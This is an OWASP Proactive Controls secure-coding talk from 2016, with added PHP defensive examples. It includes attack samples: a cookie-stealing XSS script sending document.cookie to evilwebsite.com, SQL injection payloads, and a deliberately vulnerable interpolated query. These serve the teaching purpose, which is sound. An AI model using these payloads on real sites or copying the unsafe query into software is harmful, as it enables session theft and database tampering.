
OWASP Top 10 Proactive Controls

Cyber attacks are a real and growing threat to businesses, and an increasing number of them take place at the application layer. The best defence against them is to develop applications in which security is incorporated as part of the software development lifecycle.

The OWASP Top 10 Proactive Controls project is designed to integrate security into the software development lifecycle. In this presentation for PHPNW, based on v2.0 released this year (2016), you will learn how to incorporate security into your software projects.

Recommended for all developers who want to learn security techniques that help them build more secure applications.



  1. OWASP Top 10 Proactive Controls. Katy Anton, @katyanton. PHPNW16, October 2016.
  2. OWASP Top 10 Risks - 2013
     • A1 - Injection
     • A2 - Broken Authentication and Session Management
     • A3 - Cross-Site Scripting (XSS)
     • A4 - Insecure Direct Object References
     • A5 - Security Misconfiguration
     • A6 - Sensitive Data Exposure
     • A7 - Missing Function Level Access Control
     • A8 - Cross-Site Request Forgery (CSRF)
     • A9 - Using Components with Known Vulnerabilities
     • A10 - Unvalidated Redirects and Forwards
  3. Katy Anton
     • Software development background
     • Certified Secure Software Lifecycle Professional (CSSLP)
     • Application Security Consultant @Veracode
     • OWASP Bristol Chapter Leader
     • Project Co-Leader for OWASP Top 10 Proactive Controls
     @katyanton, https://www.linkedin.com/in/katyanton
  4. Cyber attacks 2015 - 2016 (slide of news screenshots: Symfony implementation, disclosure of information, SQL injection)
  5. New Website (diagram of the example application to which the controls are added in the following slides)
  6. OWASP Application Security Verification Standard (ASVS)
  7. C1. Verify for Security Early and Often
     • Choose the level of security for your application
     • Security requirements and tests - OWASP ASVS
     • Verify for security early and often (OWASP ZAP in continuous integration)
  8. Risks prevented by C1 (Verify for security early and often): all OWASP Top 10 risks!
  9. SQL injection example
        $email = "'; -- @owasp.org";
        $sql = "UPDATE user SET email='$email' WHERE id='1'";
     becomes
        UPDATE user SET email=''; -- @owasp.org' WHERE id='1'
     Everything after "--" is a SQL comment, so the WHERE clause disappears and the UPDATE is applied to every row.
  10. C2. Parameterize Queries. Parameterized queries prevent untrusted input from being interpreted as part of a SQL command.
  11. C2. Control: Data Access Layer - example of query parametrisation. How not to do it!
      PHP:
        <?php
        $stmt = $dbh->prepare("UPDATE users SET email = {$_GET['email']} WHERE id = $id");
        $stmt->execute();
  12. C2: How NOT to
        $sql = "UPDATE users SET email = {$_GET['email']} WHERE id = $id";
      This one string combines both the code and the input, so the SQL parser cannot differentiate between code and user input. Calling prepare() on a string that already contains the input (slide 11) does not help; the values have to be bound separately.
  13. C2. Control: Data Access Layer - PHP query parametrisation, correct usage
        <?php
        $stmt = $dbh->prepare("UPDATE users SET email = :new_email WHERE id = :user_id");
        $stmt->bindParam(':new_email', $email);
        $stmt->bindParam(':user_id', $id);
        $stmt->execute();
  14. Risks prevented by C2 (Parameterize queries): A1 Injection.
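Slides 9 to 13 in runnable form, as an added example that is not part of the original deck: the slide-9 payload applied first to an interpolated UPDATE and then to a parameterised one, on an in-memory SQLite database (needs the pdo_sqlite extension). The table, its rows and the function names are constructed for this example.

```php
<?php
// Added example, not from the slides: the slide-9 payload against an
// interpolated UPDATE and against a parameterised one. Runs offline on an
// in-memory SQLite database (pdo_sqlite extension); table and rows are
// constructed here.
declare(strict_types=1);

function setUpDb(): PDO
{
    $dbh = new PDO('sqlite::memory:');
    $dbh->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
    $dbh->exec('CREATE TABLE user (id INTEGER PRIMARY KEY, email TEXT NOT NULL)');
    $dbh->exec("INSERT INTO user (id, email) VALUES (1, 'alice@example.com'), (2, 'bob@example.com')");
    return $dbh;
}

// How not to do it: code and data are glued into one string, so the SQL
// parser sees whatever the user typed as part of the statement.
function updateEmailUnsafe(PDO $dbh, int $id, string $email): void
{
    $dbh->exec("UPDATE user SET email='$email' WHERE id='$id'");
}

// Correct usage: the statement text is fixed at prepare() time and the values
// travel separately, so they are only ever treated as data.
function updateEmailSafe(PDO $dbh, int $id, string $email): void
{
    $stmt = $dbh->prepare('UPDATE user SET email = :new_email WHERE id = :user_id');
    $stmt->bindValue(':new_email', $email, PDO::PARAM_STR);
    $stmt->bindValue(':user_id', $id, PDO::PARAM_INT);
    $stmt->execute();
}

// id => email for every row, so the effect of each update is visible.
function allEmails(PDO $dbh): array
{
    return $dbh->query('SELECT id, email FROM user ORDER BY id')
               ->fetchAll(PDO::FETCH_KEY_PAIR);
}

$payload = "'; -- @owasp.org";   // the value from slide 9

$dbh = setUpDb();
updateEmailUnsafe($dbh, 1, $payload);
// The executed text was:  UPDATE user SET email=''; -- @owasp.org' WHERE id='1'
// Everything after "--" is a comment, so the WHERE clause no longer exists.
print_r(allEmails($dbh));

$dbh = setUpDb();
updateEmailSafe($dbh, 1, $payload);
// Same payload, but it is bound as a value: only row 1 changes and its
// email is the literal text of the payload.
print_r(allEmails($dbh));
```

After the unsafe update the comment introduced by "--" has swallowed the WHERE clause, so both rows end up with an empty email. After the safe update only row 1 changes, and its email is the literal payload string, because a bound value is never parsed as SQL. bindValue() is used instead of the slides' bindParam() only because it does not need a variable to bind by reference; the protection is the same.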
  15. XSS example
        <script type="text/javascript">
          var adr = 'http://evilwebsite.com/send.php?cakemonster=' + escape(document.cookie);
          var img = new Image();
          img.src = adr;
        </script>
      Once this script is injected into a page, every visitor's cookies are sent to the attacker's server as part of the image request.
  16. C3. Encode Your Output
  17. C3: Controls - contextual encoding. Symfony 2+: Twig. ZF2: ZendEscaper.
  18. Risks prevented by C3 (Encode output): A1 Injection, A3 XSS.
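Contextual encoding in plain PHP, as an added example that is not part of the original deck and not the code of Twig or ZendEscaper (those do this inside their frameworks; the point here is to make the contexts visible). The function names and the sample "name" value, which reuses the slide-15 payload, are constructed for this example.

```php
<?php
// Added example, not from the slides: one encoder per output context. The
// same untrusted value is rendered into HTML body, attribute, JavaScript and
// URL contexts, each with the rules that context needs.
declare(strict_types=1);

// HTML body text: <p>...</p>
function encodeHtml(string $s): string
{
    return htmlspecialchars($s, ENT_QUOTES | ENT_SUBSTITUTE | ENT_HTML5, 'UTF-8');
}

// Quoted HTML attribute: <input value="..."> - same rules as the body, but only
// safe if the template always puts quotes around the attribute value.
function encodeAttr(string $s): string
{
    return htmlspecialchars($s, ENT_QUOTES | ENT_SUBSTITUTE | ENT_HTML5, 'UTF-8');
}

// Inside a <script> block: emit a JSON string literal with <, >, &, ' and "
// hex-escaped, so the value can neither close the script element nor break
// out of the literal.
function encodeJs(string $s): string
{
    $out = json_encode($s, JSON_HEX_TAG | JSON_HEX_AMP | JSON_HEX_APOS | JSON_HEX_QUOT);
    return $out === false ? '""' : $out;   // invalid UTF-8: render an empty literal
}

// A value placed in a URL query parameter.
function encodeUrlParam(string $s): string
{
    return rawurlencode($s);
}

// A whole URL placed in an href: encoding alone does not stop "javascript:"
// links, so allow only http(s) and then attribute-encode.
function encodeHref(string $url): string
{
    $scheme = parse_url($url, PHP_URL_SCHEME);
    if (!in_array(strtolower((string) $scheme), ['http', 'https'], true)) {
        return '#';
    }
    return encodeAttr($url);
}

// Constructed sample: the cookie-stealing script from slide 15 supplied as a
// user's display name.
$name = '<script>var img=new Image();img.src="http://evilwebsite.com/send.php?c="+escape(document.cookie);</script>';

echo '<p>Hello ' . encodeHtml($name) . "</p>\n";
echo '<input type="text" value="' . encodeAttr($name) . "\">\n";
echo '<script>var userName = ' . encodeJs($name) . ";</script>\n";
echo '<a href="/search?q=' . encodeUrlParam($name) . "\">search</a>\n";
echo '<a href="' . encodeHref('javascript:alert(1)') . "\">profile</a>\n";
```

Run it and compare the five lines: the same input comes out differently in each context, which is why a single "escape everything" call at the data layer is not enough; the encoder has to be chosen at the point where the value is written into the page.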
  19. C4. Validate All Input
  20. C4: Examples of what to validate
     • GET / POST data (including hidden fields)
     • File uploads
     • HTTP headers
     • Cookies
     • Data read back from the database
  21. C4: Controls. The PHP filter extension is available as standard since PHP 5.2. Example of both sanitisation and validation:
        <?php
        $sanitised_url = filter_var($url, FILTER_SANITIZE_URL);
        if (filter_var($sanitised_url, FILTER_VALIDATE_URL)) {
            echo "This is a valid URL.";
        }
      A well-formed URL is not necessarily a safe one: also check that the scheme and host are what the application expects.
  22. Input validation prevents 2nd-order SQL injection. Registration form: two users register, "john" and "john'--". The username value "john'--" is stored as-is and becomes the SQL injection payload later.
  23. 2nd-order SQL injection example, change-password form: logged in as "john'--", the user submits current password, new password and confirmation.
  24. 2nd-order SQL injection example: the password update, built with the stored username,
        UPDATE users SET password='123' WHERE username='john'--' and password='abc'
      becomes
        UPDATE users SET password='123' WHERE username='john'
      The rest of the statement is commented out, so the password of the real user "john" is changed without knowing his current password.
  25. Risks prevented by C4 (Validate all input): A1 Injection, A3 XSS, A10 Unvalidated redirects and forwards.
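Allowlist validation for the input kinds listed on slide 20, including the registration username from slides 22 to 24 and a redirect target (the A10 case), as an added example that is not part of the original deck. The function names, the rules and the request arrays are constructed for this example. Note that parameterising the password UPDATE (C2) would also stop the second-order attack; validation at registration is defence in depth, not a substitute.

```php
<?php
// Added example, not from the slides: allowlist validation for the inputs
// the C4 slide lists, plus the second-order case from slides 22-24. Rules,
// names and the request arrays are constructed for this example.
declare(strict_types=1);

// Username: later echoed into SQL and HTML, so only a tight character set and
// length are accepted. "john'--" fails here and never reaches the database.
function validUsername(string $u): bool
{
    return (bool) preg_match('/\A[a-z0-9_]{3,32}\z/', $u);
}

function validEmail(string $e): bool
{
    return filter_var($e, FILTER_VALIDATE_EMAIL) !== false && strlen($e) <= 254;
}

// Integer id from the query string: anything that is not a positive int is rejected.
function validId(string $raw): ?int
{
    $id = filter_var($raw, FILTER_VALIDATE_INT, ['options' => ['min_range' => 1]]);
    return $id === false ? null : $id;
}

// Redirect target (A10): accept only a local path. "//host" and "/\host" are
// read by browsers as protocol-relative URLs, so a second "/" or a "\" right
// after the leading "/" is refused.
function validLocalRedirect(string $next): bool
{
    return (bool) preg_match('#\A/(?![/\\\\])[A-Za-z0-9_\-./?=&]*\z#', $next);
}

// Uploaded file: allowlist the extension and sniff the real content type
// instead of trusting the Content-Type the client sent.
function validImageUpload(string $path, string $clientName): bool
{
    $ext = strtolower(pathinfo($clientName, PATHINFO_EXTENSION));
    if (!in_array($ext, ['png', 'jpg', 'jpeg'], true)) {
        return false;
    }
    $mime = (new finfo(FILEINFO_MIME_TYPE))->file($path);
    return in_array($mime, ['image/png', 'image/jpeg'], true);
}

// Constructed request: the registration form from slide 22 plus a query string.
$post = ['username' => "john'--", 'email' => 'john@example.com'];
$get  = ['id' => '7', 'next' => '//evilwebsite.com/'];

$errors = [];
if (!validUsername($post['username'])) {
    $errors[] = 'username: lowercase letters, digits and _ only (3-32 chars)';
}
if (!validEmail($post['email'])) {
    $errors[] = 'email: not a valid address';
}
if (validId($get['id']) === null) {
    $errors[] = 'id: must be a positive integer';
}
if (!validLocalRedirect($get['next'])) {
    $errors[] = 'next: only local paths are allowed';
}
print_r($errors);
```

With the constructed request, the username and the redirect target are rejected and the e-mail and id pass. validImageUpload() is not exercised because it needs a file on disk; call it with the temporary path from $_FILES and the client-supplied name.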
  26. New Website (diagram): C1 Verify for Security Early and Often, C2 Parametrize Queries, C3 Encode Data, C4 Validate Input.
  27. C5. Implement Identity and Authentication Control
  28. C5: Best practices
     • Secure password storage
     • Multi-factor authentication
     • Secure password recovery mechanism
     • Transmit sensitive data only over TLS (v1.2)
     • Error messages
     • Prevent brute-force attacks
  29. C5. PHP password storage
     • password_hash("my_password", PASSWORD_DEFAULT) (the algorithm argument is required; PASSWORD_DEFAULT is currently bcrypt)
     • available since PHP 5.5
     • a compatibility library exists for versions < 5.5
  30. C5. Password storage - how not to
        $password = bcrypt([salt] + [password], work_factor);
        $loginkey = md5(lc([username]) . "::" . lc([password]));
      Be consistent when storing sensitive data! The second line undoes the first: a fast, unsalted MD5 of the same password stored next to the bcrypt hash is what an attacker will crack.
  31. C5. Forgot password design:
     1) Ask one or more security questions.
     2) Send the user a randomly generated token.
     3) Verify the token in the same web session.
     4) Change the password.
     Resource: https://www.owasp.org/index.php/Forgot_Password_Cheat_Sheet
  32. C5. Error messages. How not to do it: one error message for a valid user and a different one for a not-registered user. Error messages must be identical both at the HTTP level (status code, response) and in the HTML shown to the user, otherwise the login form becomes a username enumeration oracle.
  33. Risks prevented by C5 (Establish identity and authentication controls): A2 Broken Authentication and Session Management.
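Slides 29, 31 and 32 in code, as an added example that is not part of the original deck: password storage with password_hash(), a login whose failure answer is the same for an unknown user and for a wrong password, and a reset token (steps 2 and 3 of slide 31) stored as a hash and checked with hash_equals(). The $users and $resets arrays, the function names and the cost value are constructed for this example; binding the token to the web session is left to the session layer.

```php
<?php
// Added example, not from the slides: password storage with password_hash(),
// a login whose failure answer is identical for unknown users and wrong
// passwords, and a reset token stored as a hash and checked with hash_equals().
// $users and $resets are in-memory arrays standing in for database tables.
declare(strict_types=1);

const BCRYPT_OPTIONS = ['cost' => 12];

// Slide 29: never store the password; store a slow, salted hash of it.
function storePassword(string $plain): string
{
    return password_hash($plain, PASSWORD_DEFAULT, BCRYPT_OPTIONS);
}

// Slide 32: one message and one amount of work, whichever part was wrong.
// $dummyHash is a hash of a random string that is verified when the user does
// not exist, so response time does not reveal which usernames are real.
function login(array &$users, string $username, string $password, string $dummyHash): array
{
    $user = $users[$username] ?? null;
    $hash = $user['password_hash'] ?? $dummyHash;
    $verified = password_verify($password, $hash);    // always executed
    if ($user === null || !$verified) {
        return ['ok' => false, 'message' => 'Invalid username or password'];
    }
    // Upgrade old hashes transparently when the cost parameter is raised.
    if (password_needs_rehash($hash, PASSWORD_DEFAULT, BCRYPT_OPTIONS)) {
        $users[$username]['password_hash'] = storePassword($password);
    }
    return ['ok' => true, 'message' => 'Welcome'];
}

// Slide 31, steps 2 and 3: a random token, stored hashed so a leaked table
// cannot be replayed, with a short lifetime.
function issueResetToken(array &$resets, string $username): string
{
    $token = bin2hex(random_bytes(32));
    $resets[$username] = ['hash' => hash('sha256', $token), 'expires' => time() + 900];
    return $token;   // delivered out of band (e-mail); never logged
}

function redeemResetToken(array &$resets, string $username, string $presented): bool
{
    $rec = $resets[$username] ?? null;
    if ($rec === null || time() > $rec['expires']) {
        return false;
    }
    if (!hash_equals($rec['hash'], hash('sha256', $presented))) {
        return false;
    }
    unset($resets[$username]);   // single use
    return true;
}

// Constructed walk-through
$dummyHash = password_hash(bin2hex(random_bytes(16)), PASSWORD_DEFAULT, BCRYPT_OPTIONS);
$users  = ['john' => ['password_hash' => storePassword('correct horse battery staple')]];
$resets = [];

echo login($users, 'john', 'wrong', $dummyHash)['message'], "\n";
echo login($users, 'nobody', 'wrong', $dummyHash)['message'], "\n";   // same text as above

$token = issueResetToken($resets, 'john');
if (redeemResetToken($resets, 'john', $token)) {
    $users['john']['password_hash'] = storePassword('new passphrase');
}
var_dump(login($users, 'john', 'new passphrase', $dummyHash)['ok']);
```

The two failed logins produce the same message, and because password_verify() runs against $dummyHash when the user is missing, both take roughly the same time. Raising the cost in BCRYPT_OPTIONS later is enough to migrate stored hashes: password_needs_rehash() returns true on the next successful login and the hash is replaced.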
  34. C6. Implement Appropriate Access Controls
  35. C6: Best practices
     • Deny by default
     • Least privilege
     • Force all requests to go through access control checks
     • Check on the server when each function is accessed
  36. C6: Role-based vs resource-based ACLs
      Role based:
        if (user.hasRole("Project Manager")) {
            // show the project report button
        } else {
            // don't show the button
        }
      When another role also needs the report, every check like this has to change:
        if (user.hasRole("Project Manager") || user.hasRole("Admin")) {
            // show the project report button
        } else {
            // don't show the button
        }
      Resource based (the check names the permission, not the roles that hold it):
        if (user.isPermitted("project:view:123")) {
            // show the project report button
        } else {
            // don't show the button
        }
  37. Risks prevented by C6 (Implement appropriate access controls): A4 Insecure Direct Object References, A7 Missing Function Level Access Control.
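A server-side, deny-by-default, resource-based check in PHP, as an added example that is not part of the original deck. Slide 36 shows the check around a button; this one sits in front of the request handler, which is where it has to be for A4 and A7. The policy table, the user and project shapes and the function names are constructed for this example.

```php
<?php
// Added example, not from the slides: a deny-by-default, resource-based
// permission check enforced on the server for every request. The policy
// table and the user/project arrays are invented for this example.
declare(strict_types=1);

// Which roles may perform which action on a project. Anything not listed
// here is denied (deny by default).
const POLICY = [
    'project:view'   => ['member', 'manager', 'admin'],
    'project:edit'   => ['manager', 'admin'],
    'project:delete' => ['admin'],
];

function isPermitted(array $user, string $action, array $project): bool
{
    $allowedRoles = POLICY[$action] ?? [];        // unknown action: deny
    if (!array_intersect($allowedRoles, $user['roles'])) {
        return false;                             // role lacks the action (A7)
    }
    if (in_array('admin', $user['roles'], true)) {
        return true;
    }
    // Horizontal check (A4): holding the role is not enough, the user must
    // also be a member of this particular project.
    return in_array($user['id'], $project['member_ids'], true);
}

// Every request passes through here before the handler runs ("force all
// requests to go through access control checks").
function handleRequest(array $user, string $action, array $projects, int $projectId): string
{
    $project = $projects[$projectId] ?? null;
    if ($project === null || !isPermitted($user, $action, $project)) {
        return '403 Forbidden';   // same answer for "does not exist" and "not yours"
    }
    return "200 OK: $action on project $projectId";
}

// Constructed data
$projects = [
    123 => ['member_ids' => [1, 2]],
    456 => ['member_ids' => [3]],
];
$alice = ['id' => 1, 'roles' => ['manager']];
$bob   = ['id' => 3, 'roles' => ['member']];

echo handleRequest($alice, 'project:edit', $projects, 123), "\n";    // her project, role allows edit
echo handleRequest($alice, 'project:edit', $projects, 456), "\n";    // someone else's project
echo handleRequest($bob, 'project:delete', $projects, 456), "\n";    // his project, role cannot delete
echo handleRequest($bob, 'project:archive', $projects, 456), "\n";   // action not in the policy
```

Only the first request succeeds. Hiding a button in the UI, as on slide 36, is a usability measure; the check in handleRequest() is the security control, and it runs even when the request was crafted by hand with a different project id.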
  38. C7. Protect Data
  39. C7 controls: data in transit - HTTPS
     • Confidentiality: an eavesdropper cannot view your data
     • Integrity: an eavesdropper cannot change your data
     • Authenticity: the server you visit is the right one
     MITM protection - HSTS: HTTPS + Strict-Transport-Security header
  40. C7 controls: data at rest
     1. Algorithm: AES (Advanced Encryption Standard)
     2. Secure key management
     3. Adequate access controls and auditing
  41. Risks prevented by C7 (Protect data): A6 Sensitive Data Exposure.
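The HSTS header from slide 39 and AES for data at rest from slide 40, as an added example that is not part of the original deck. It uses AES-256-GCM through PHP's OpenSSL extension (openssl_encrypt() with an authentication tag needs PHP 7.1 or later), so tampering is detected rather than silently decrypted to garbage. The record being protected, the key source and the function names are constructed for this example.

```php
<?php
// Added example, not from the slides: the transport header from slide 39 and
// authenticated AES-256-GCM for data at rest from slide 40 via the OpenSSL
// extension (PHP 7.1+ for the GCM tag). The record and key are constructed.
declare(strict_types=1);

// --- Data in transit: HSTS. Only meaningful on an HTTPS response. ----------
function sendHsts(): void
{
    if (!empty($_SERVER['HTTPS']) && $_SERVER['HTTPS'] !== 'off') {
        header('Strict-Transport-Security: max-age=31536000; includeSubDomains');
    }
}

// --- Data at rest: AES-256-GCM. ---------------------------------------------
// $aad is extra data that is authenticated but not encrypted, used here to tie
// a record to its owner so one user's blob cannot be replayed under another.
function encryptRecord(string $plaintext, string $key, string $aad = ''): string
{
    if (strlen($key) !== 32) {
        throw new InvalidArgumentException('AES-256 needs a 32-byte key');
    }
    $iv  = random_bytes(12);              // 96-bit nonce, fresh for every message
    $tag = '';
    $ct  = openssl_encrypt($plaintext, 'aes-256-gcm', $key, OPENSSL_RAW_DATA, $iv, $tag, $aad, 16);
    if ($ct === false) {
        throw new RuntimeException('encryption failed');
    }
    // Stored layout: iv || tag || ciphertext. None of the three is secret.
    return base64_encode($iv . $tag . $ct);
}

function decryptRecord(string $blob, string $key, string $aad = ''): string
{
    $raw = base64_decode($blob, true);
    if ($raw === false || strlen($raw) < 28) {
        throw new RuntimeException('malformed ciphertext');
    }
    $iv  = substr($raw, 0, 12);
    $tag = substr($raw, 12, 16);
    $ct  = substr($raw, 28);
    $pt  = openssl_decrypt($ct, 'aes-256-gcm', $key, OPENSSL_RAW_DATA, $iv, $tag, $aad);
    if ($pt === false) {
        // Wrong key, wrong AAD or modified bytes: GCM refuses to decrypt.
        throw new RuntimeException('authentication failed');
    }
    return $pt;
}

// Constructed demo. In production the key comes from a KMS, HSM or an
// environment variable, never from the repository or the same database.
$key  = random_bytes(32);
$blob = encryptRecord('card=4111 1111 1111 1111 (test number)', $key, 'user:42');
echo decryptRecord($blob, $key, 'user:42'), "\n";

try {
    decryptRecord($blob, $key, 'user:43');   // same blob, different owner
} catch (RuntimeException $e) {
    echo 'rejected: ', $e->getMessage(), "\n";
}
```

The second decrypt fails because the AAD no longer matches, which is the "adequate access controls" item of slide 40 expressed cryptographically. Keeping the key out of the database (item 2) is what makes a dump of the table worthless on its own.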
  42. New Website (diagram): C1 Verify for Security Early and Often, C2 Parametrize Queries, C3 Encode Data, C4 Validate Input, C5 Authentication, C6 Access Controls, C7 Protect Data.
  43. C8. Implement Logging and Intrusion Detection
  44. Risks prevented by C8 (Logging and intrusion detection): all OWASP Top 10 risks!
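Security-event logging and a simple detection rule built on it, as an added example that is not part of the original deck: each event is one JSON line with the secrets stripped, and a detector counts failed logins per source address in a sliding window. The event format, the field names, the thresholds and the sample events are all constructed for this example.

```php
<?php
// Added example, not from the slides: structured security-event logging and
// a brute-force detection rule (too many AUTH_FAILURE events from one source
// in a short window). Event format, thresholds and events are constructed.
declare(strict_types=1);

// One JSON line per event. Passwords, tokens and similar must never be logged;
// they are dropped here even if a caller passes them.
function securityEvent(string $type, array $fields): string
{
    $base = [
        'ts'   => gmdate('c'),
        'type' => $type,
        'ip'   => $fields['ip'] ?? 'unknown',
        'user' => $fields['user'] ?? null,
    ];
    unset($fields['password'], $fields['token']);
    return json_encode($base + $fields, JSON_UNESCAPED_SLASHES) . "\n";
}

final class BruteForceDetector
{
    /** @var array<string, int[]> ip => timestamps of recent failures */
    private $failures = [];
    private $threshold;
    private $windowSec;

    public function __construct(int $threshold = 5, int $windowSec = 300)
    {
        $this->threshold = $threshold;
        $this->windowSec = $windowSec;
    }

    // Feed every parsed event; returns true when the source crosses the threshold.
    public function observe(array $event): bool
    {
        if ($event['type'] !== 'AUTH_FAILURE') {
            return false;
        }
        $ip  = $event['ip'];
        $now = strtotime($event['ts']);
        $this->failures[$ip][] = $now;
        $cutoff = $now - $this->windowSec;
        $this->failures[$ip] = array_values(array_filter(
            $this->failures[$ip],
            function (int $t) use ($cutoff) { return $t >= $cutoff; }
        ));
        return count($this->failures[$ip]) >= $this->threshold;
    }
}

// Constructed log: six failures from one address, then a failure and a
// success from another.
$log = '';
for ($i = 0; $i < 6; $i++) {
    $log .= securityEvent('AUTH_FAILURE', ['ip' => '203.0.113.7', 'user' => "user$i", 'password' => 'x']);
}
$log .= securityEvent('AUTH_FAILURE', ['ip' => '198.51.100.2', 'user' => 'alice']);
$log .= securityEvent('AUTH_SUCCESS', ['ip' => '198.51.100.2', 'user' => 'alice']);

$detector = new BruteForceDetector(5, 300);
foreach (explode("\n", trim($log)) as $line) {
    $event = json_decode($line, true);
    if ($detector->observe($event)) {
        echo "ALERT brute force from {$event['ip']} at {$event['ts']}\n";
    }
}
echo $log;
```

The alert fires from the fifth failure of 203.0.113.7 onwards and never for 198.51.100.2; the printed log shows that the password field passed by the caller was dropped before the line was written. In a real deployment the detector would read from the log pipeline rather than from a string, and an alert would feed lockout or rate limiting (the brute-force item of C5).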
  45. C9. Leverage Security Frameworks and Libraries
  46. C9: Examples
     • Framework with CSRF protection
     • Framework with XSS protection
     • ORM - SQL injection prevention
     • Vetted cryptographic algorithms
  47. C9: Best practices
     • Use trusted sources
     • Low coupling (low coupling == reduced attack surface)
     • Update regularly / replace
  48. Risks prevented by C9 (Leverage security frameworks and libraries): all OWASP Top 10 risks!
  49. C10. Error and Exception Handling
  50. C10: Best practices
     • Centralised error handling
     • Verbose enough to explain the issue
     • Don't leak critical information
  51. Risks prevented by C10 (Error and exception handling): all OWASP Top 10 risks!
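The three C10 practices in one handler, as an added example that is not part of the original deck: one central place receives every exception, writes the verbose detail with a correlation id where developers look, and returns only a generic message carrying that id where the attacker looks. The class, the in-memory log and the failing database call are constructed for this example.

```php
<?php
// Added example, not from the slides: a centralised handler that logs the
// full exception with a correlation id and shows the user only a generic
// message carrying that id. The log sink is a constructed in-memory array.
declare(strict_types=1);

final class ErrorHandler
{
    /** @var string[] what the developers see */
    public $log = [];

    public function register(): void
    {
        ini_set('display_errors', '0');              // never dump errors into the page
        set_exception_handler([$this, 'handle']);
        // Warnings and notices become exceptions so they take the same path.
        set_error_handler(function (int $no, string $str, string $file, int $line): bool {
            throw new ErrorException($str, 0, $no, $file, $line);
        });
    }

    // Verbose enough to explain the issue: class, message, file and line
    // go to the log, keyed by an id the user can quote to support.
    public function handle(Throwable $e): void
    {
        $id = bin2hex(random_bytes(8));
        $this->log[] = sprintf('[%s] id=%s %s: %s at %s:%d', gmdate('c'), $id,
            get_class($e), $e->getMessage(), $e->getFile(), $e->getLine());
        $this->respond($id);
    }

    // Don't leak critical information: no stack trace, SQL text or paths
    // in the response, just the reference id.
    private function respond(string $id): void
    {
        if (!headers_sent()) {
            http_response_code(500);
        }
        echo "Something went wrong. Reference: $id\n";
    }
}

function connectToDb(string $dsn): void
{
    // Constructed failure standing in for a real connection error whose text
    // would reveal the internal host name and driver to whoever sees it.
    throw new RuntimeException("SQLSTATE[HY000] could not connect to db-internal.example ($dsn)");
}

$handler = new ErrorHandler();
$handler->register();

try {
    connectToDb('mysql:host=db-internal.example;dbname=shop');
} catch (RuntimeException $e) {
    $handler->handle($e);     // the same method set_exception_handler() will call for uncaught ones
}
print_r($handler->log);       // the verbose side, for developers only
```

The response line contains nothing but the reference id; the log entry contains the host name, the DSN and the source location. Because register() also routes uncaught exceptions and converted warnings to handle(), a forgotten try/catch still ends up with the same generic page rather than a PHP warning printed into the HTML.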
  52. New Website (diagram): C1 Verify for Security Early and Often, C2 Parametrize Queries, C3 Encode Data, C4 Validate Input, C5 Authentication, C6 Access Controls, C7 Protect Data, C8 Logging, C9 Leverage Security Frameworks and Libraries, C10 Error Handling.
  53. It's a start to secure software by default!
  54. Reference: OWASP Proactive Controls Project, https://www.owasp.org/index.php/OWASP_Proactive_Controls
  55. Thank you
